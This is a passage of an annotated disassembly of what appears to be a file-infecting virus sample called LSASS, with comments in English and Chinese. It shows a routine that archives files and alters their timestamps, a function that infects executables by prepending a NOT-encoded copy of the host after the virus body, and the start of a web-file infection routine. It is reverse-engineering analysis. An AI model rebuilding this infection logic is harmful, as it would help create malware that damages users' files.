004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
004028AC |. 50 |PUSH EAX
004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]
004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
004028B4 |. 50 |PUSH EAX
004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028C1 |. 51 |PUSH ECX
004028C2 |. 50 |PUSH EAX
004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]
004028C6 |. 50 |PUSH EAX
004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
004028D1 |. 50 |PUSH EAX
004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]
004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028D9 |. 50 |PUSH EAX
004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028DF |. 50 |PUSH EAX
004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23
004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]
004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]
004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]
00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]
00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402925 |. 53 |PUSH EBX
00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402953 |. 51 |PUSH ECX
00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040295D |. 8BC4 |MOV EAX,ESP
0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402962 |. 51 |PUSH ECX
00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402966 |. 51 |PUSH ECX
00402967 |. 50 |PUSH EAX
00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1
00402972 |. 59 |POP ECX
00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
00402976 |. 59 |POP ECX
00402977 |. 50 |PUSH EAX
00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
0040297E |. 50 |PUSH EAX
0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]
00402985 |. 50 |PUSH EAX
00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
00402993 |. 50 |PUSH EAX ; |dest
00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
00402999 |. 59 |POP ECX
0040299A |. 59 |POP ECX
0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]
004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004029A6 |. 53 |PUSH EBX ; /Arg5
004029A7 |. 53 |PUSH EBX ; |Arg4
004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004029AE |. 53 |PUSH EBX ; |Arg3
004029AF |. 50 |PUSH EAX ; |Arg2
004029B0 |. 53 |PUSH EBX ; |Arg1
004029B1 |. 8BCE |MOV ECX,ESI ; |
004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB
004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file
004029BA |. 75 5D |JNZ SHORT LSASS.00402A19
004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"
004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24
004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004029D5 |. 53 |PUSH EBX ; /hTemplateFile
004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
004029DD |. 53 |PUSH EBX ; |pSecurity
004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName
004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
004029F4 |. 51 |PUSH ECX ; /pLastWrite
004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004029F8 |. 51 |PUSH ECX ; |pLastAccess
004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004029FC |. 51 |PUSH ECX ; |pCreationTime
004029FD |. 50 |PUSH EAX ; |hFile
004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject
00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]
00402A24 |. 57 |PUSH EDI
00402A25 |. 50 |PUSH EAX
00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A2B |. 51 |PUSH ECX
00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
00402A32 |. 8BCC |MOV ECX,ESP
00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402A37 |. 52 |PUSH EDX
00402A38 |. 50 |PUSH EAX
00402A39 |. 51 |PUSH ECX
00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25
00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A43 |. 8BCE |MOV ECX,ESI
00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1
00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]
00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]
00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA
00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000
00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA
...
00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]
00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]
00402AD0 |. 50 |PUSH EAX ; /pFindFileData
00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile
00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA
00402ADA |. 85C0 |TEST EAX,EAX
00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234
00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch
00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose
2 感染exe文件的函数
00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; exe file infect function
0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>
00406352 |. 83EC 3C SUB ESP,3C
00406355 |. 53 PUSH EBX
00406356 |. 56 PUSH ESI
00406357 |. 8BF1 MOV ESI,ECX
00406359 |. 57 PUSH EDI
0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040636C |. 50 PUSH EAX
0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]
00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48]
0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68]
0040637E |. 50 PUSH EAX ; /statbuf
0040637F |. 57 PUSH EDI ; |path
00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; get file com/lsass.exe base info
00406389 |. 59 POP ECX
0040638A |. 85C0 TEST EAX,EAX
0040638C |. 59 POP ECX
0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX
00406392 |. 75 07 JNZ SHORT LSASS.0040639B
00406394 |> 32DB XOR BL,BL
00406396 |. E9 13010000 JMP LSASS.004064AE
0040639B |> 50 PUSH EAX ; /size
0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc
004063A2 |. 85C0 TEST EAX,EAX ; allocate a memory
004063A4 |. 59 POP ECX
004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; buf
004063AB |.^ 74 E7 JE SHORT LSASS.00406394
004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"
004063B2 |. 57 PUSH EDI ; |path
004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |msvcrt.fopen
004063B9 |. FFD7 CALL EDI ; /fopen
004063BB |. 59 POP ECX ; open file com/lsass.exe
004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
004063BF |. 85C0 TEST EAX,EAX
004063C1 |. 59 POP ECX
004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; read file com/lsass.exe to buf
004063C8 |. 50 PUSH EAX ; /stream
004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |msvcrt.fread
004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = 27004 (159748.)
004063D5 |. 6A 01 PUSH 1 ; |size = 1
004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf
004063DD |. FFD3 CALL EBX ; /fread
004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream
004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |
004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] ; close file handle
004063EE |. 83C4 14 ADD ESP,14
004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]
004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F
004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174]
00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]
00406406 |. 51 PUSH ECX ; /statbuf
00406407 |. 50 PUSH EAX ; |path
00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
0040640E |. 59 POP ECX ; get need infect file base info to statbuf
0040640F |. 85C0 TEST EAX,EAX
00406411 |. 59 POP ECX
00406412 |. 0F85 74020000 JNZ LSASS.0040668C
00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX
0040641B |. 0F84 6B020000 JE LSASS.0040668C
00406421 |. 8BCE MOV ECX,ESI
00406423 |. E8 DA020000 CALL LSASS.00406702 ; LoadResource here
00406428 |. 84C0 TEST AL,AL
0040642A |. 74 73 JE SHORT LSASS.0040649F
0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; the file can be infected
00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"
00406437 |. 50 PUSH EAX
00406438 |. FFD7 CALL EDI ; open need infect file
0040643A |. 59 POP ECX ; file path
0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; need infect file handle
0040643E |. 85C0 TEST EAX,EAX
00406440 |. 59 POP ECX
00406441 |. 74 5C JE SHORT LSASS.0040649F
00406443 |. 51 PUSH ECX
00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040644A |. 8BCC MOV ECX,ESP
0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
0040644F |. 50 PUSH EAX
00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; check file whether is infected function
0040645A |. 84C0 TEST AL,AL
0040645C |. 59 POP ECX
0040645D |. 74 1B JE SHORT LSASS.0040647A ; jmp if can infected
0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
00406474 |. 59 POP ECX
00406475 |. B3 01 MOV BL,1
00406477 |. 59 POP ECX
00406478 |. EB 34 JMP SHORT LSASS.004064AE
0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET
0040647C |. 6A 00 PUSH 0 ; |offset = 0
0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream
00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek
00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; set need file ptr as 0
0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"
00406492 |. 50 PUSH EAX ; create a temporary file: system32/com/~
00406493 |. FFD7 CALL EDI ; fopen
00406495 |. 83C4 14 ADD ESP,14
00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; com/~ handle
0040649B |. 85C0 TEST EAX,EAX
0040649D |. 75 22 JNZ SHORT LSASS.004064C1
0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
004064A5 |. 32DB XOR BL,BL ; |
004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
004064AD |. 59 POP ECX
004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004064BA |. 8AC3 MOV AL,BL
004064BC |. E9 E6010000 JMP LSASS.004066A7
004064C1 |> 50 PUSH EAX ; /write self-virus file to temporary file(com/~)
004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |msvcrt.fwrite
004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n
004064CB |. 6A 01 PUSH 1 ; |size = 1
004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr
004064D3 |. FFD7 CALL EDI ; /fwrite
004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34]
004064DE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064E0 |. 6A 01 PUSH 1
004064E2 |. 50 PUSH EAX
004064E3 |. FFD7 CALL EDI ; fwrite
004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]
004064EE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064F0 |. 6A 01 PUSH 1
004064F2 |. 50 PUSH EAX
004064F3 |. FFD7 CALL EDI ; fwrite
004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; filestream
004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read all need infect file
00406505 |. 6A 01 PUSH 1
00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; rBuf
0040650D |. FFD3 CALL EBX ; fread
0040650F |. 83C4 40 ADD ESP,40 ;
00406512 |> 85C0 /TEST EAX,EAX ; EXA initial value = 0x1c000(need infect file
size)
00406514 |. 0F84 8B000000 |JE LSASS.004065A5
0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; flag
0040651E |. 74 59 |JE SHORT LSASS.00406579
00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; save inital postion to ECX
00406526 |. 83C1 09 |ADD ECX,9 ; ECX += 9; 224
00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C]
0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX
00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; if ECX > [40D03C](self-virus size) then jmp;
00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040653A |. 03CA ||ADD ECX,EDX
0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
0040653E |. F6D2 ||NOT DL
00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; modified, then save back
00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp
00406545 |. 83C1 0B ||ADD ECX,0B ; ECX += 0x0B; offset = 0x0B
00406548 |.^ EB DF |/JMP SHORT LSASS.00406529
0040654A |> 33C9 |XOR ECX,ECX ; ECX = 0;
0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; if [40D03C] <= ECX then jmp;
00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040655D |. 03CA ||ADD ECX,EDX ; ECX += EDX;
0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
00406561 |. F6D2 ||NOT DL
00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; midified, then save back
00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp;
00406568 |. 41 ||INC ECX
00406569 |. 41 ||INC ECX ; ECX += 2;
0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; if ECX < [40D03C](self-virus size) then jmp
(continue decode);
00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; then decode over, write to temporary file
00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; write to file com/~
0040657C |. 50 |PUSH EAX
0040657D |. 6A 01 |PUSH 1
0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406585 |. FFD7 |CALL EDI ; fwrite
00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
00406593 |. 6A 01 |PUSH 1
00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040659B |. FFD3 |CALL EBX ; fread
0040659D |. 83C4 20 |ADD ESP,20
004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512
004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream
004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose
004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; |
004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb"
004065BB |. 50 PUSH EAX ; |path
004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen
004065C2 |. 59 POP ECX ; open com/lsass.exe
004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; handle
004065C6 |. 85C0 TEST EAX,EAX
004065C8 |. 59 POP ECX
004065C9 |. 0F84 BD000000 JE LSASS.0040668C
004065CF |. 50 PUSH EAX
004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read com/lsass.exe all
004065DA |. 6A 01 PUSH 1
004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]
004065E2 |. FFD3 CALL EBX ; fread
004065E4 |. 83C4 10 ADD ESP,10
004065E7 |> 85C0 /TEST EAX,EAX
004065E9 |. 74 5E |JE SHORT LSASS.00406649
004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0
004065EF |. 74 2F |JE SHORT LSASS.00406620
004065F1 |. 33C9 |XOR ECX,ECX
004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX
004065FC |. 76 1E |JBE SHORT LSASS.0040661C
004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]
00406604 |. 03CA ||ADD ECX,EDX
00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
00406608 |. F6D2 ||NOT DL
0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL
0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
0040660F |. 41 ||INC ECX
00406610 |. 41 ||INC ECX
00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX
0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE
0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0
00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20]
00406623 |. 50 |PUSH EAX
00406624 |. 6A 01 |PUSH 1
00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040662C |. FFD7 |CALL EDI ; fwrite
0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
0040663A |. 6A 01 |PUSH 1
0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406642 |. FFD3 |CALL EBX ; fread, read next
00406644 |. 83C4 20 |ADD ESP,20
00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7
00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C]
00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
00406655 |. 6A 04 PUSH 4
00406657 |. 6A 01 PUSH 1
00406659 |. 50 PUSH EAX
0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX
0040665C |. FFD7 CALL EDI
0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |msvcrt.fclose
00406667 |. FFD7 CALL EDI ; /fclose
00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040666C |. FFD7 CALL EDI
0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040667A |. 83C4 1C ADD ESP,1C
0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404]
00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1
0040668A |. EB 0D JMP SHORT LSASS.00406699
0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
00406698 |. 59 POP ECX
00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004066A5 |. 32C0 XOR AL,AL
004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004066AA |. 5F POP EDI
004066AB |. 5E POP ESI
004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
004066B3 |. 5B POP EBX
004066B4 |. C9 LEAVE
004066B5 /. C3 RETN
3 web文件感染函数
00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; web file infect function
00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog>
00402BA1 |. 81EC 60040000 SUB ESP,460
00402BA7 |. 53 PUSH EBX
00402BA8 |. 56 PUSH ESI
00402BA9 |. 8BF1 MOV ESI,ECX
00402BAB |. 6A 01 PUSH 1
00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402BB0 |. 5B POP EBX
00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X>
00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr>
00402BBE |. 53 PUSH EBX
